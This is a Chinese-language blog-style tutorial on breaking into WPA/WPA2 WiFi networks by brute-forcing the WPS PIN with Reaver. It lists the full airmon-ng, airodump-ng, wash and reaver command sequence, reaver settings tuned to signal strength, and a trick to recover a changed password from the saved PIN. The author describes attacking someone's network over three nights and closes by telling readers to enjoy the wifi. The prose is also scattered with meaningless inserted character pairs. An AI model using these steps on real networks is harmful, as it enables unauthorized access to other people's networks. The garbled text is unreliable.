前言
前段時間寫了一篇如何用airceack-ng獲取握手包從而破解wifi密碼的文章聘殖。一般來說只要有耐心瘪菌,都能截獲握手包。但獲取密碼的最后一步跑cap包十分耗時毫目,而且如果字典不夠大蔬啡,經(jīng)常跑不出來诲侮。而且一旦wifi管理員更改密碼,又要重新來一遍箱蟆。今天介紹的方法依舊非常耗時沟绪,但是好在一定能獲得密碼,并且wifi管理員更改密碼空猜,很快可以重新獲得更改后的密碼绽慈。
背景
讓我們簡單了解一下Reaver的工作原理。它利用了WiFi保護設(shè)置(WiFi Protected Setup - 下文中簡稱為WPS)的一個弱點辈毯,WPS是許多路由器上都有的一個功能坝疼,可以為用戶提供簡單的配置過程,它與設(shè)備中硬編碼保存的一個PIN碼綁定在一起谆沃。Reaver利用的就是PIN碼的一個缺陷钝凶,最終的結(jié)果就是,只要有足夠的時間唁影,它就能破解WPA或WPA2的密碼腿椎。當然,很多路由器支持PIN碼的修改夭咬,但是絕大多數(shù)人并不會這么做。
過程
關(guān)閉進程
部分進程可能影響到后續(xù)的操作铆隘。
airmon-ng check kill
開啟網(wǎng)卡
airmon-ng start wlan1
查看ap信號強度
破解的wifi當然要選信號強的卓舵,這樣的wifi破解速度更快,用起來也更好膀钠。
airodump-ng wlan1mon
查看支持wps的ap
wash -i wlan1mon -C
reaver
應因狀況調(diào)整參數(shù):MAC即BSSID的值掏湾,-c后面的數(shù)字是CH的值。
目標信號非常好:
reaver -i wlan1mon -b MAC -a -S -vv -d0 -c 1
目標信號普通:
reaver -i wlan1mon -b MAC -a -S -vv -d2 -t 5 -c 1
目標信號一般:
reaver -i wlan1mon -b MAC -a -S -vv -d5 -c 1
然后就是長時間的等待肿嘲。像圖中這種每十次就要等待60s融击,等待的時間長一點,但是一定能得到結(jié)果雳窟。像這個wifi我破解了三個晚上尊浪。白天該干啥干啥,晚上睡前攻擊wifi拇涤。而且reaver可以隨時停止,它自己會保存進度誉结。
最終你就能得到wifi的PIN碼以及密碼鹅士。把這兩個記下來,一般來說wifi主人過段時間就會更改密碼但不會更改PIN碼惩坑,這時我們只要加上 -p 命令掉盅,WiFi密碼秒出也拜。
愉快的享受wifi吧!
